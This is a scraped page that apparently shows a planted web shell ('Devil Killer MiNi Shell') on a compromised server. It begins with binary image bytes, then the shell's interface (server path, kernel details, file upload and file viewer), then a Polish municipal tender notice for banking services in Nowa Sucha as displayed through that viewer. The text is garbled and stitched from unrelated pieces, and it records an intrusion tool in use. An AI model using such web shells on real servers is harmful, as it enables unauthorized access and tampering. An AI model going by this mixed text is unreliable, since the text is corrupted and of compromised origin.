JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0063040401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa bankowa budżetu gminy Nowa Sucha i gminnych jednostek organizacyjnych w okresie od 1 stycznia 2025r. do 31 grudnia 2028r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nowa Sucha</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa Sucha</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sucha</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-513</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">468612051</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@nowasucha.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">nowasucha.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa bankowa budżetu gminy Nowa Sucha i gminnych jednostek organizacyjnych w okresie od 1 stycznia 2025r. do 31 grudnia 2028r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d84798fc-79a7-4740-8c84-5ce205a5cd64</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00630404</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d84798fc-79a7-4740-8c84-5ce205a5cd64 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postepowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>- platformy e-Zamówienia która dostępna jest pod adresem: https://ezamowienia.gov.pl/<br/>- poczty elektronicznej pod adresem gmina@nowasucha.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie e-Zamówienia. Wykonawca posiadający konto na e-Zamówienia ma dostęp do następujących formularzy: ,,Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „ Formularza do komunikacji&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; Zamawiający może żądać od osoby występującej z żądaniem wskazania dokładnych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych; skorzystanie przez osobę, której dane osobowe dotyczą z uprawnienia do sprostowania lub uzupełnienia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą, a także nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych; zgłoszenie żądania ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania*;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP:271.14.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowa bankowa obsługa budżetu Gminy Nowa Sucha oraz jednostek organizacyjnych Gminy w okresie od 01.01.2025r. do 31.12.2028r. (4 lata).<br/>2.	Obsługą bankową objęte będą następujące jednostki organizacyjne Gminy Nowa Sucha:<br/>1)	Urząd Gminy Nowa Sucha, Nowa Sucha 59A, 96-513 Nowa Sucha<br/>2)	Zakład Gospodarki Komunalnej, Nowa Sucha 59A, 96-513 Nowa Sucha;<br/>3)	Publiczne Przedszkole w Nowej Suchej, Nowa Sucha 50A, 96-513 Nowa Sucha;<br/>4)	Szkoła Podstawowa im. Jakuba Kopacza w Nowej Suchej, Nowa Sucha 16, 96-513 Nowa Sucha;<br/>5)	Szkoła Podstawowa im. Bohaterów Bitwy nad Bzurą w Kozłowie Szlacheckim, Kozłów Szlachecki 54, 96-513 Nowa Sucha;<br/>6)	Szkoła Podstawowa im. Kornela Makuszyńskiego w Kozłowie Biskupim, Kozłów Biskupi ul. Olimpijska 1, 96-513 Nowa Sucha;<br/>7)	Szkoła Podstawowa im. Ks. Jana Twardowskiego w Kurdwanowie, Kurdwanów 35, 96-513 Nowa Sucha;<br/>8)	Gminny Ośrodek Pomocy Społecznej w Nowej Suchej, Nowa Sucha 59A, 96-513 Nowa Sucha;<br/>9)	Gminny Ośrodek Kultury w Nowej Suchej, Nowa Sucha 50A, 96-513 Nowa Sucha;<br/>10)	Gminna Biblioteka Publiczna w Nowej Suchej, Nowa Sucha 50, 96-513 Nowa Sucha.<br/>3.	W zakresie przedmiotu zamówienia wchodzi bankowa obsługa jednostek wymienionych w punkcie 2, obejmująca w szczególności następujące czynności bankowe:<br/>1)	Otwarcie, prowadzenie i obsługa istniejących oraz wszystkich innych otwartych w okresie obowiązywania umowy rachunków bankowych bieżących, pomocniczych budżetu, funduszy celowych i specjalnych, kont wirtualnych do realizacji wpłat masowych.<br/>2)	Realizowanie poleceń przelewów wewnętrznych między rachunkami w tym samym banku oraz poleceń przelewów zewnętrznych do obcych banków w formie elektronicznej i papierowej w walucie krajowej i zagranicznej.<br/>3)	Likwidacja rachunków bankowych na pisemny wniosek Zamawiającego, bez opłat i prowizji. Likwidacja rachunku nie wymaga sporządzenie aneksu do umowy.<br/>4)	Przyjmowanie wpłat gotówkowych własnych i obcych dokonywanych na rachunek jednostek.<br/>5)	Pobór gotówki za pośrednictwem blankietów czekowych.<br/>6)	Dokonywanie wypłat gotówkowych, w tym na rzecz osób trzecich.<br/>7)	Przyjmowanie środków na lokaty terminowe.<br/>8)	Świadczenie usługi przewalutowania.<br/>9)	Potwierdzenie stanu salda dokonywanych operacji finansowych na każdy dzień roboczy na wszystkich rachunkach bieżących i pomocniczych (wyciągi bankowe papierowe z ustaleniem salda i dokładnego opisu dokonanej operacji), uznanie i obciążanie rachunków w dniu operacji.<br/>10)	Naliczanie i kapitalizacja odsetek dokonywana w okresie miesięcznym ostatniego dnia miesiąca. Dopuszcza się możliwość nieoprocentowania środków pieniężnych według odrębnej dyspozycji zamawiającego.<br/>11)	Oprocentowanie zgromadzonych środków następować będzie według zmiennej stopy procentowej w stosunku rocznym, wyliczonej według formuły WIBID dla okresu 1-miesięcznego x mnożnik (z oferty). Zmiana oprocentowania następować będzie w miesięcznych okresach kalendarzowych i obowiązywać będzie od pierwszego dnia roboczego każdego kolejnego miesiąca kalendarzowego.<br/>12)	Opłaty i prowizje za obsługę bankową naliczane będą na koniec każdego miesiąca w rachunku podstawowym.<br/>13)	Usługę „wyzerowania” wskazanych rachunków bieżących i pomocniczych Gminy i jednostek organizacyjnych Gminy, polegającą na przekazaniu z dniem 31 grudnia każdego roku kwot pozostałych na ww. rachunkach Gminy i jednostek organizacyjnych na wskazany rachunek bankowy.<br/>14)	Zapewnienie Zamawiającemu w pełni funkcjonalnego systemu bankowości elektronicznej wraz z odpowiednim oprogramowaniem. <br/>15)	Umożliwienie stosowania podpisu elektronicznego w ramach systemu bankowości elektronicznej.<br/>16)	Realizacja operacji bankowych we wszystkich trybach (zwykłym, pilnym i ekspresowy i systemach (ELIXIR, SORBENT, SWIFFT, SEPA i innych).<br/>17)	Zapewnienie wsparcia merytorycznego i technicznego dla Zamawiającego.<br/>18)	Wydawanie blankietów czekowych.<br/>19)	Wydawanie opinii i zaświadczeń na wniosek posiadacza rachunku.<br/>4.	Wymagania dodatkowe:<br/>1)	udzielenie zamówienia mogą ubiegać się wykonawcy posiadający zezwolenie na prowadzenie działalności bankowej określonej w przepisach ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2023 r. poz. 2488 z późn. zm.), znajdujące się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia. <br/>2)	Wykonawca winien posiadać placówkę (filię, punkt) na terenie Gminy Nowa Sucha lub zapewnić odbiór i dostawę gotówki z/do punktu kasowego w jednostkach Gminy Nowa Sucha na żądanie zgłoszone przez kasjera lub osobę odpowiedzialną za stan gotówki, nie częściej niż raz dzienne w dniu, na własny koszt, zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa przewozu środków pieniężnych <br/>3)	Z postępowania o udzielenie zamówienia Zamawiający może wykluczyć Wykonawcę w stosunku, do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli poprzez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. Prawo restrukturyzacyjne (Dz. U. z 2024 r. poz. 1428 ze zm.) lub którego upadłość ogłoszono z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. – Prawo upadłościowe (Dz. U. z 2024 r. poz. 794. z późn. zm.),<br/>4)	Zamawiający wymaga, aby stanowiska do bankowości elektronicznej funkcjonowały od dnia obowiązywania umowy, <br/>5)	Wykonawca w ramach złożonej oferty jest zobowiązany do zapewnienia kompleksowej obsługi elektronicznej w standardzie zapewniającym pełne bezpieczeństwo, zgodne z przepisami prawa w zakresie bankowości i obsługi finansowej budżetu Gminy Nowa Sucha oraz jej jednostek organizacyjnych, <br/>6)	Wykonawca winien zapewnić wykonanie czynności organizacyjnych związanych z obsługą bankową budżetu Gminy Nowa Sucha oraz jednostek organizacyjnych codziennie od poniedziałku do piątku, nie krócej niż w godzinach 8:30 – 14:30, <br/>7)	Zamawiający informuje, że wszystkie materiały dotyczące budżetu Gminy Nowa Sucha są umieszczone na stronie internetowej https://bip.nowasucha.pl/<br/>8)	Ponadto Zamawiający informuje, że:<br/>- Roczny budżet Gminy Nowa Sucha wynosi około 62 000 000,00 PLN,<br/>- Ilość aktualnie obsługiwanych kont wirtualnych wynosi 9 000 szt.<br/>5.	Ze względu na rodzaj zadań realizowanych przez Gminny Ośrodek Pomocy Społecznej w Nowej Suchej, przedmiot zamówienia w odniesieniu do w/w jednostki organizacyjnej obejmuje ponadto:<br/>1)	Wykonawca zapewni wypłatę zasiłków i świadczeń (w obrocie gotówkowym) w co najmniej jednym wydzielonym punkcie kasowym, przeznaczonym do wypłaty świadczeń, których płatnikiem jest Gminny Ośrodek Pomocy Społecznej, czynnym w godzinach pracy banku. W ofercie Wykonawca wskaże punkt kasowy do wypłaty świadczeń gotówkowych, o których mowa wyżej, <br/>2)	Wykonawca ponosi odpowiedzialność za operacje wykonane niezgodnie z dyspozycją posiadacza rachunku, w tym wypłat świadczeń osobom nieuprawnionym. Wykonawca ma prawo odmówić wypłaty świadczenia pieniężnego w przypadku wątpliwości co do tożsamości osoby zgłaszającej się po wypłatę świadczenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66110000-4 - Usługi bankowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66112000-8 - Usługi depozytowe</p> <p class="mb-0">66113000-5 - Usługi udzielania kredytu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2028-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">O wyborze najkorzystniejszej oferty decydować będą następujące kryteria:<br/>Opłaty i prowizje (wyrażone w złotych) suma P1<br/>Oprocentowanie środków pieniężnych na rachunkach bankowych (stawka WIBID 1M x marża banku) P2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Oprocentowanie środków pieniężnych na rachunkach bankowych (stawka WIBID 1M x marża banku)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a)	Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/>W zakresie warunku posiadania uprawnień do wykonywania określonej działalności zawodowej Wykonawca musi wykazać, że: posiada zezwolenie na rozpoczęcie działalności bankowej, o którym mowa w art. 36 Ustawy Prawo Bankowe (Dz. U. 2023 r. poz. 2488 ze zm.) a w przypadku banków państwowych, pisemne oświadczenie, że bank prowadzi działalność na podstawie stosownych rozporządzeń. Warunki posiadania uprawnień musi spełniać każdy z podmiotów występujących wspólnie. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br/>b)	Sytuacji ekonomicznej lub finansowej: <br/>Nie dotyczy.<br/>c)	Zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada placówkę (filię, punkt) w gminie Nowa Sucha (na dzień składania ofert), lub utworzy do dnia 01.01.2025r. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/ nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający wymagał będzie od Wykonawcy, którego oferta została najwyżej oceniona złożenia następujących podmiotowych środków dowodowych: <br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b)	Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej (załącznik nr 3 do SWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, Zamawiający wymagał będzie od Wykonawcy którego oferta została najwyżej oceniona złożenia następujących podmiotowych środków dowodowych:<br/> a) aktualne zezwolenie na prowadzenie działalności bankowej na terenie Rzeczpospolitej Polskiej, a także realizacji usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2023 r. poz. 2488 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe, inny dokument – potwierdzający rozpoczęcie działalności bankowej przed wejściem w życie przepisów ustawy, o której mowa w art. 193 ustawy Prawo Bankowe.<br/>b) wykazu placówek zgodnie z załącznikiem nr 4 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Zgodnie z art. 58 ust. 1 ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zgodnie z art. 58 ust. 2 ustawy PZP Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z 